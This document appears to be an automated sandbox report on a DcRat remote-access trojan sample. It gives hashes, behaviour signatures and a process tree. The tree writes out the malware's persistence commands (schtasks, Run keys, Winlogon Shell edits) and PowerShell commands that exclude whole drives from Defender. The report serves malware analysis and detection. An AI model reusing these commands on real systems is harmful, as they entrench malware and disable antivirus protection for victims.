Analysis
max time kernel: 107s
max time network: 147s
platform: windows7_x64
resource: win7-20240903-en
resource tags: arch:x64, arch:x86, image:win7-20240903-en, locale:en-us, os:windows7-x64, system
submitted: 26-01-2025 13:26

Static task: static1
Behavioral task: behavioral1
  Sample: af4b66ff9b1f5830080860380efa81e4.exe
  Resource: win7-20240903-en
Behavioral task: behavioral2
  Sample: af4b66ff9b1f5830080860380efa81e4.exe
  Resource: win10v2004-20241007-en

General
Target: af4b66ff9b1f5830080860380efa81e4.exe
Size: 7.0MB
MD5: af4b66ff9b1f5830080860380efa81e4
SHA1: 53cc9bb12117af3f77354733abc4ef48ad339932
SHA256: 429a6c2aa2f62fe5b656de97dd25152cd8e653d92a8dd5e75d067308b784bfaf
SHA512: 8796e8f5cd290dc5cbf009a886796b61d7137630c89067450d863596cd9296eed846ffd5cd53e6750a5c52ba2741f95e3d8169c010ec307371c304a056acf431
SSDEEP: 196608:M3NyJWZ3HC5ObjKh7+mSGZ5gPZaQC4b5DV2h:MdOWZyCUpt8b9Vy
Malware Config
Signatures
DcRat
DarkCrystal (DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.

Dcrat family
Modifies WinLogon for persistence 2 TTPs 6 IoCs
description | ioc | Process
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\fontwin\\taskeng.exe\", \"C:\\Program Files\\Java\\jre7\\lib\\audiodg.exe\"" | MsServerHost.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\fontwin\\taskeng.exe\", \"C:\\Program Files\\Java\\jre7\\lib\\audiodg.exe\", \"C:\\Recovery\\209d6542-69f6-11ef-b491-62cb582c238c\\conhost.exe\"" | MsServerHost.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\fontwin\\taskeng.exe\", \"C:\\Program Files\\Java\\jre7\\lib\\audiodg.exe\", \"C:\\Recovery\\209d6542-69f6-11ef-b491-62cb582c238c\\conhost.exe\", \"C:\\Program Files (x86)\\Microsoft Synchronization Services\\ADO.NET\\v1.0\\cmd.exe\"" | MsServerHost.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\fontwin\\taskeng.exe\", \"C:\\Program Files\\Java\\jre7\\lib\\audiodg.exe\", \"C:\\Recovery\\209d6542-69f6-11ef-b491-62cb582c238c\\conhost.exe\", \"C:\\Program Files (x86)\\Microsoft Synchronization Services\\ADO.NET\\v1.0\\cmd.exe\", \"C:\\Recovery\\209d6542-69f6-11ef-b491-62cb582c238c\\smss.exe\"" | MsServerHost.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\fontwin\\taskeng.exe\", \"C:\\Program Files\\Java\\jre7\\lib\\audiodg.exe\", \"C:\\Recovery\\209d6542-69f6-11ef-b491-62cb582c238c\\conhost.exe\", \"C:\\Program Files (x86)\\Microsoft Synchronization Services\\ADO.NET\\v1.0\\cmd.exe\", \"C:\\Recovery\\209d6542-69f6-11ef-b491-62cb582c238c\\smss.exe\", \"C:\\fontwin\\MsServerHost.exe\"" | MsServerHost.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\fontwin\\taskeng.exe\"" | MsServerHost.exe
Process spawned unexpected child process 18 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description | pid | pid_target | Process | procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 1700 | 1756 | schtasks.exe | 76
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 1132 | 1756 | schtasks.exe | 76
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 2424 | 1756 | schtasks.exe | 76
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 1996 | 1756 | schtasks.exe | 76
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 2332 | 1756 | schtasks.exe | 76
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 588 | 1756 | schtasks.exe | 76
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 1552 | 1756 | schtasks.exe | 76
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 888 | 1756 | schtasks.exe | 76
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 1792 | 1756 | schtasks.exe | 76
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 1688 | 1756 | schtasks.exe | 76
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 1708 | 1756 | schtasks.exe | 76
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 2468 | 1756 | schtasks.exe | 76
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 616 | 1756 | schtasks.exe | 76
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 1816 | 1756 | schtasks.exe | 76
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 844 | 1756 | schtasks.exe | 76
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 2308 | 1756 | schtasks.exe | 76
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 2840 | 1756 | schtasks.exe | 76
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 2168 | 1756 | schtasks.exe | 76
Suspicious use of NtCreateUserProcessOtherParentProcess 13 IoCs
description | pid | Process | procid_target
PID 2656 created 1200 | 2656 | twain32.exe | 21
PID 2656 created 1200 | 2656 | twain32.exe | 21
PID 2656 created 1200 | 2656 | twain32.exe | 21
PID 2656 created 1200 | 2656 | twain32.exe | 21
PID 2656 created 1200 | 2656 | twain32.exe | 21
PID 2656 created 1200 | 2656 | twain32.exe | 21
PID 588 created 1200 | 588 | updater.exe | 21
PID 588 created 1200 | 588 | updater.exe | 21
PID 588 created 1200 | 588 | updater.exe | 21
PID 588 created 1200 | 588 | updater.exe | 21
PID 588 created 1200 | 588 | updater.exe | 21
PID 588 created 1200 | 588 | updater.exe | 21
PID 588 created 1200 | 588 | updater.exe | 21
pid | Process
576 | powershell.exe
2596 | powershell.exe
2124 | powershell.exe
2500 | powershell.exe
2432 | powershell.exe
2664 | powershell.exe
1588 | powershell.exe
2576 | powershell.exe
2592 | powershell.exe
2368 | powershell.exe
864 | powershell.exe
1804 | powershell.exe
2688 | powershell.exe
2368 | powershell.exe
2960 | powershell.exe
2856 | powershell.exe
1592 | powershell.exe
2336 | powershell.exe
2948 | powershell.exe
1872 | powershell.exe
2380 | powershell.exe
2500 | powershell.exe
2172 | powershell.exe
Stops running service(s) 4 TTPs
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description | ioc | Process
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate | wmiprvse.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | wmiprvse.exe
Executes dropped EXE 5 IoCs
pid | Process
2520 | MpDefenderCoreService.exe
2656 | twain32.exe
588 | updater.exe
1524 | MsServerHost.exe
576 | smss.exe
Indicator Removal: Clear Windows Event Logs 1 TTPs 1 IoCs
Clear Windows Event Logs to hide the activity of an intrusion.
description | ioc | Process
File opened for modification | C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Known Folders API Service.evtx | svchost.exe
Loads dropped DLL 5 IoCs
pid | Process
1544 | af4b66ff9b1f5830080860380efa81e4.exe
1544 | af4b66ff9b1f5830080860380efa81e4.exe
1972 | taskeng.exe
1532 | cmd.exe
1532 | cmd.exe
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
Adds Run key to start application 2 TTPs 12 IoCs
description | ioc | Process
Set value (str) | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows\CurrentVersion\Run\smss = "\"C:\\Recovery\\209d6542-69f6-11ef-b491-62cb582c238c\\smss.exe\"" | MsServerHost.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\taskeng = "\"C:\\fontwin\\taskeng.exe\"" | MsServerHost.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows\CurrentVersion\Run\audiodg = "\"C:\\Program Files\\Java\\jre7\\lib\\audiodg.exe\"" | MsServerHost.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\audiodg = "\"C:\\Program Files\\Java\\jre7\\lib\\audiodg.exe\"" | MsServerHost.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\conhost = "\"C:\\Recovery\\209d6542-69f6-11ef-b491-62cb582c238c\\conhost.exe\"" | MsServerHost.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\cmd = "\"C:\\Program Files (x86)\\Microsoft Synchronization Services\\ADO.NET\\v1.0\\cmd.exe\"" | MsServerHost.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\MsServerHost = "\"C:\\fontwin\\MsServerHost.exe\"" | MsServerHost.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows\CurrentVersion\Run\taskeng = "\"C:\\fontwin\\taskeng.exe\"" | MsServerHost.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows\CurrentVersion\Run\conhost = "\"C:\\Recovery\\209d6542-69f6-11ef-b491-62cb582c238c\\conhost.exe\"" | MsServerHost.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows\CurrentVersion\Run\cmd = "\"C:\\Program Files (x86)\\Microsoft Synchronization Services\\ADO.NET\\v1.0\\cmd.exe\"" | MsServerHost.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\smss = "\"C:\\Recovery\\209d6542-69f6-11ef-b491-62cb582c238c\\smss.exe\"" | MsServerHost.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows\CurrentVersion\Run\MsServerHost = "\"C:\\fontwin\\MsServerHost.exe\"" | MsServerHost.exe
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow | ioc
4 | pastebin.com
5 | pastebin.com
Power Settings 1 TTPs 10 IoCs
powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.
pid | Process
2204 | cmd.exe
1336 | powercfg.exe
1620 | powercfg.exe
704 | powercfg.exe
1820 | powercfg.exe
1068 | powercfg.exe
564 | powercfg.exe
2060 | powercfg.exe
3044 | cmd.exe
1700 | powercfg.exe
Drops file in System32 directory 32 IoCs
description | ioc | Process
File created | C:\Windows\System32\Tasks\conhostc | svchost.exe
File opened for modification | C:\Windows\System32\Tasks\smsss | svchost.exe
File created | C:\Windows\System32\Tasks\MsServerHostM | svchost.exe
File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | powershell.exe
File created | C:\Windows\System32\Tasks\taskengt | svchost.exe
File created | \??\c:\Windows\System32\CSCC9902AE3669E46CBA835304E20B91DA7.TMP | csc.exe
File opened for modification | C:\Windows\System32\Tasks\audiodga | svchost.exe
File opened for modification | C:\Windows\System32\Tasks\audiodg | svchost.exe
File created | C:\Windows\System32\Tasks\cmdc | svchost.exe
File created | C:\Windows\System32\Tasks\smsss | svchost.exe
File created | C:\Windows\System32\Tasks\smss | svchost.exe
File opened for modification | C:\Windows\System32\Tasks\MsServerHostM | svchost.exe
File created | C:\Windows\System32\Tasks\GoogleUpdateTaskMachineQC | svchost.exe
File created | C:\Windows\System32\Tasks\audiodga | svchost.exe
File opened for modification | C:\Windows\System32\Tasks\cmd | svchost.exe
File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | powershell.exe
File opened for modification | C:\Windows\System32\Tasks\GoogleUpdateTaskMachineQC | svchost.exe
File opened for modification | C:\Windows\System32\Tasks\cmdc | svchost.exe
File opened for modification | C:\Windows\System32\Tasks\conhostc | svchost.exe
File created | C:\Windows\System32\Tasks\conhost | svchost.exe
File opened for modification | C:\Windows\System32\Tasks\MsServerHost | svchost.exe
File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | powershell.exe
File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | powershell.exe
File opened for modification | C:\Windows\System32\Tasks\taskeng | svchost.exe
File created | C:\Windows\System32\Tasks\audiodg | svchost.exe
File opened for modification | C:\Windows\System32\Tasks\conhost | svchost.exe
File created | C:\Windows\System32\Tasks\MsServerHost | svchost.exe
File created | C:\Windows\System32\Tasks\cmd | svchost.exe
File opened for modification | C:\Windows\System32\Tasks\smss | svchost.exe
File opened for modification | C:\Windows\System32\Tasks\taskengt | svchost.exe
File created | C:\Windows\System32\Tasks\taskeng | svchost.exe
File created | \??\c:\Windows\System32\byyuy-.exe | csc.exe
Suspicious use of SetThreadContext 4 IoCs
description | pid | Process | procid_target
PID 2656 set thread context of 1952 | 2656 | twain32.exe | 44
PID 588 set thread context of 1624 | 588 | updater.exe | 68
PID 588 set thread context of 1368 | 588 | updater.exe | 74
PID 588 set thread context of 1932 | 588 | updater.exe | 75
Drops file in Program Files directory 6 IoCs
description | ioc | Process
File created | C:\Program Files\Google\Chrome\updater.exe | twain32.exe
File created | C:\Program Files\Google\Libs\WR64.sys | updater.exe
File created | C:\Program Files (x86)\Microsoft Synchronization Services\ADO.NET\v1.0\cmd.exe | MsServerHost.exe
File created | C:\Program Files (x86)\Microsoft Synchronization Services\ADO.NET\v1.0\ebf1f9fa8afd6d | MsServerHost.exe
File created | C:\Program Files\Java\jre7\lib\audiodg.exe | MsServerHost.exe
File created | C:\Program Files\Java\jre7\lib\42af1c969fbb7b | MsServerHost.exe
Drops file in Windows directory 1 IoCs
description | ioc | Process
File opened for modification | C:\Windows\appcompat\programs\RecentFileCache.bcf | svchost.exe
Launches sc.exe 10 IoCs
Sc.exe is a Windows utility to control services on the system.
pid | Process
2484 | sc.exe
2580 | sc.exe
2892 | sc.exe
316 | sc.exe
2292 | sc.exe
1536 | sc.exe
2464 | sc.exe
1492 | sc.exe
2840 | sc.exe
1512 | sc.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
System Location Discovery: System Language Discovery 1 TTPs 4 IoCs
Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
description | ioc | Process
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | cmd.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | af4b66ff9b1f5830080860380efa81e4.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | MpDefenderCoreService.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | WScript.exe
Checks processor information in registry 2 TTPs 6 IoCs
Processor information is often read in order to detect sandboxing environments.
description | ioc | Process
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | wmiprvse.exe
Key queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | wmiprvse.exe
Key security queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | wmiprvse.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Component Information | wmiprvse.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | wmiprvse.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | wmiprvse.exe
Enumerates system info in registry 2 TTPs 1 IoCs
description | ioc | Process
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier | wmiprvse.exe
Modifies data under HKEY_USERS 6 IoCs
description | ioc | Process
Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\ROOT\CTLs | dialer.exe
Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage | powershell.exe
Set value (data) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = b04a48e3f56fdb01 | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\ROOT | dialer.exe
Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates | dialer.exe
Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\ROOT\CRLs | dialer.exe
Scheduled Task/Job: Scheduled Task 1 TTPs 20 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid | Process
1132 | schtasks.exe
2332 | schtasks.exe
2308 | schtasks.exe
2264 | schtasks.exe
1552 | schtasks.exe
1792 | schtasks.exe
1816 | schtasks.exe
844 | schtasks.exe
1708 | schtasks.exe
616 | schtasks.exe
2168 | schtasks.exe
1700 | schtasks.exe
2424 | schtasks.exe
588 | schtasks.exe
888 | schtasks.exe
1688 | schtasks.exe
2488 | schtasks.exe
1996 | schtasks.exe
2468 | schtasks.exe
2840 | schtasks.exe
Suspicious behavior: EnumeratesProcesses 64 IoCs
Suspicious use of AdjustPrivilegeToken 64 IoCs
Suspicious use of SetWindowsHookEx 1 IoCs
pid | Process
2456 | conhost.exe
Suspicious use of WriteProcessMemory 64 IoCs
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
C:\Windows\system32\winlogon.exe | winlogon.exe | PID:428
C:\Windows\system32\services.exe | C:\Windows\system32\services.exe | PID:472
  C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k DcomLaunch | PID:604
    C:\Windows\system32\DllHost.exe | C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683} | PID:2032
    C:\Windows\system32\wbem\wmiprvse.exe | C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding | PID:1756
      - Checks BIOS information in registry
      - Checks processor information in registry
      - Enumerates system info in registry
      C:\Windows\system32\schtasks.exe | schtasks.exe /create /tn "taskengt" /sc MINUTE /mo 7 /tr "'C:\fontwin\taskeng.exe'" /f | PID:1700
        - Process spawned unexpected child process
        - Scheduled Task/Job: Scheduled Task
      C:\Windows\system32\schtasks.exe | schtasks.exe /create /tn "taskeng" /sc ONLOGON /tr "'C:\fontwin\taskeng.exe'" /rl HIGHEST /f | PID:1132
        - Process spawned unexpected child process
        - Scheduled Task/Job: Scheduled Task
      C:\Windows\system32\schtasks.exe | schtasks.exe /create /tn "taskengt" /sc MINUTE /mo 13 /tr "'C:\fontwin\taskeng.exe'" /rl HIGHEST /f | PID:2424
        - Process spawned unexpected child process
        - Scheduled Task/Job: Scheduled Task
      C:\Windows\system32\schtasks.exe | schtasks.exe /create /tn "audiodga" /sc MINUTE /mo 11 /tr "'C:\Program Files\Java\jre7\lib\audiodg.exe'" /f | PID:1996
        - Process spawned unexpected child process
        - Scheduled Task/Job: Scheduled Task
      C:\Windows\system32\schtasks.exe | schtasks.exe /create /tn "audiodg" /sc ONLOGON /tr "'C:\Program Files\Java\jre7\lib\audiodg.exe'" /rl HIGHEST /f | PID:2332
        - Process spawned unexpected child process
        - Scheduled Task/Job: Scheduled Task
      C:\Windows\system32\schtasks.exe | schtasks.exe /create /tn "audiodga" /sc MINUTE /mo 11 /tr "'C:\Program Files\Java\jre7\lib\audiodg.exe'" /rl HIGHEST /f | PID:588
        - Process spawned unexpected child process
        - Scheduled Task/Job: Scheduled Task
      C:\Windows\system32\schtasks.exe | schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 6 /tr "'C:\Recovery\209d6542-69f6-11ef-b491-62cb582c238c\conhost.exe'" /f | PID:1552
        - Process spawned unexpected child process
        - Scheduled Task/Job: Scheduled Task
      C:\Windows\system32\schtasks.exe | schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Recovery\209d6542-69f6-11ef-b491-62cb582c238c\conhost.exe'" /rl HIGHEST /f | PID:888
        - Process spawned unexpected child process
        - Scheduled Task/Job: Scheduled Task
      C:\Windows\system32\schtasks.exe | schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 13 /tr "'C:\Recovery\209d6542-69f6-11ef-b491-62cb582c238c\conhost.exe'" /rl HIGHEST /f | PID:1792
        - Process spawned unexpected child process
        - Scheduled Task/Job: Scheduled Task
      C:\Windows\system32\schtasks.exe | schtasks.exe /create /tn "cmdc" /sc MINUTE /mo 9 /tr "'C:\Program Files (x86)\Microsoft Synchronization Services\ADO.NET\v1.0\cmd.exe'" /f | PID:1688
        - Process spawned unexpected child process
        - Scheduled Task/Job: Scheduled Task
      C:\Windows\system32\schtasks.exe | schtasks.exe /create /tn "cmd" /sc ONLOGON /tr "'C:\Program Files (x86)\Microsoft Synchronization Services\ADO.NET\v1.0\cmd.exe'" /rl HIGHEST /f | PID:1708
        - Process spawned unexpected child process
        - Scheduled Task/Job: Scheduled Task
      C:\Windows\system32\schtasks.exe | schtasks.exe /create /tn "cmdc" /sc MINUTE /mo 5 /tr "'C:\Program Files (x86)\Microsoft Synchronization Services\ADO.NET\v1.0\cmd.exe'" /rl HIGHEST /f | PID:2468
        - Process spawned unexpected child process
        - Scheduled Task/Job: Scheduled Task
      C:\Windows\system32\schtasks.exe | schtasks.exe /create /tn "smsss" /sc MINUTE /mo 14 /tr "'C:\Recovery\209d6542-69f6-11ef-b491-62cb582c238c\smss.exe'" /f | PID:616
        - Process spawned unexpected child process
        - Scheduled Task/Job: Scheduled Task
      C:\Windows\system32\schtasks.exe | schtasks.exe /create /tn "smss" /sc ONLOGON /tr "'C:\Recovery\209d6542-69f6-11ef-b491-62cb582c238c\smss.exe'" /rl HIGHEST /f | PID:1816
        - Process spawned unexpected child process
        - Scheduled Task/Job: Scheduled Task
      C:\Windows\system32\schtasks.exe | schtasks.exe /create /tn "smsss" /sc MINUTE /mo 13 /tr "'C:\Recovery\209d6542-69f6-11ef-b491-62cb582c238c\smss.exe'" /rl HIGHEST /f | PID:844
        - Process spawned unexpected child process
        - Scheduled Task/Job: Scheduled Task
      C:\Windows\system32\schtasks.exe | schtasks.exe /create /tn "MsServerHostM" /sc MINUTE /mo 11 /tr "'C:\fontwin\MsServerHost.exe'" /f | PID:2308
        - Process spawned unexpected child process
        - Scheduled Task/Job: Scheduled Task
      C:\Windows\system32\schtasks.exe | schtasks.exe /create /tn "MsServerHost" /sc ONLOGON /tr "'C:\fontwin\MsServerHost.exe'" /rl HIGHEST /f | PID:2840
        - Process spawned unexpected child process
        - Scheduled Task/Job: Scheduled Task
      C:\Windows\system32\schtasks.exe | schtasks.exe /create /tn "MsServerHostM" /sc MINUTE /mo 7 /tr "'C:\fontwin\MsServerHost.exe'" /rl HIGHEST /f | PID:2168
        - Process spawned unexpected child process
        - Scheduled Task/Job: Scheduled Task
  C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k RPCSS | PID:680
  C:\Windows\System32\svchost.exe | C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted | PID:752
    - Indicator Removal: Clear Windows Event Logs
  C:\Windows\System32\svchost.exe | C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted | PID:824
    C:\Windows\system32\Dwm.exe | "C:\Windows\system32\Dwm.exe" | PID:1168
  C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k netsvcs | PID:868
    - Drops file in System32 directory
    - Drops file in Windows directory
    - Suspicious use of AdjustPrivilegeToken
    C:\Windows\system32\taskeng.exe | taskeng.exe {FB6E12B7-C8B6-4EBE-BB22-28CE7B128E13} S-1-5-18:NT AUTHORITY\System:Service: | PID:1972
      - Loads dropped DLL
      C:\Program Files\Google\Chrome\updater.exe | "C:\Program Files\Google\Chrome\updater.exe" | PID:588
        - Suspicious use of NtCreateUserProcessOtherParentProcess
        - Executes dropped EXE
        - Suspicious use of SetThreadContext
        - Drops file in Program Files directory
        - Suspicious use of AdjustPrivilegeToken
  C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k LocalService | PID:972
  C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k NetworkService | PID:280
  C:\Windows\System32\spoolsv.exe | C:\Windows\System32\spoolsv.exe | PID:548
  C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork | PID:1076
  C:\Windows\system32\taskhost.exe | "taskhost.exe" | PID:1116
  C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation | PID:2752
  C:\Windows\system32\sppsvc.exe | C:\Windows\system32\sppsvc.exe | PID:2064
C:\Windows\system32\lsass.exe | C:\Windows\system32\lsass.exe | PID:488
C:\Windows\system32\lsm.exe | C:\Windows\system32\lsm.exe | PID:496
C:\Windows\Explorer.EXE | C:\Windows\Explorer.EXE | PID:1200
  C:\Users\Admin\AppData\Local\Temp\af4b66ff9b1f5830080860380efa81e4.exe | "C:\Users\Admin\AppData\Local\Temp\af4b66ff9b1f5830080860380efa81e4.exe" | PID:1544
    - Loads dropped DLL
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    C:\Users\Admin\AppData\Local\Temp\MpDefenderCoreService.exe | "C:\Users\Admin\AppData\Local\Temp\MpDefenderCoreService.exe" | PID:2520
      - Executes dropped EXE
      - System Location Discovery: System Language Discovery
      - Suspicious use of WriteProcessMemory
      C:\Windows\SysWOW64\WScript.exe | "C:\Windows\System32\WScript.exe" "C:\fontwin\n5YK.vbe" | PID:2820
        - System Location Discovery: System Language Discovery
        C:\Windows\SysWOW64\cmd.exe | cmd /c ""C:\fontwin\eUNvwPScHJBqRVxJMAbWN67h5pJ3FqxG.bat" " | PID:1532
          - Loads dropped DLL
          - System Location Discovery: System Language Discovery
          C:\fontwin\MsServerHost.exe | "C:\fontwin/MsServerHost.exe" | PID:1524
            - Modifies WinLogon for persistence
            - Executes dropped EXE
            - Adds Run key to start application
            - Drops file in Program Files directory
            C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\l0xa5amt\l0xa5amt.cmdline" | PID:2208
              - Drops file in System32 directory
              C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES5B88.tmp" "c:\Windows\System32\CSCC9902AE3669E46CBA835304E20B91DA7.TMP" | PID:2420
            C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | "powershell" -Command Add-MpPreference -ExclusionPath 'C:/' | PID:2856
              - Command and Scripting Interpreter: PowerShell
            C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/' | PID:1592
              - Command and Scripting Interpreter: PowerShell
            C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/' | PID:2432
              - Command and Scripting Interpreter: PowerShell
            C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | "powershell" -Command Add-MpPreference -ExclusionPath 'C:/fontwin/' | PID:2664
              - Command and Scripting Interpreter: PowerShell
            C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | "powershell" -Command Add-MpPreference -ExclusionPath 'C:/MSOCache/'
- Command and Scripting Interpreter: PowerShell
PID:2172
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'7⤵
- Command and Scripting Interpreter: PowerShell
PID:2500
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'7⤵
- Command and Scripting Interpreter: PowerShell
PID:864
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'7⤵
- Command and Scripting Interpreter: PowerShell
PID:2948
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'7⤵
- Command and Scripting Interpreter: PowerShell
PID:1804
-
-
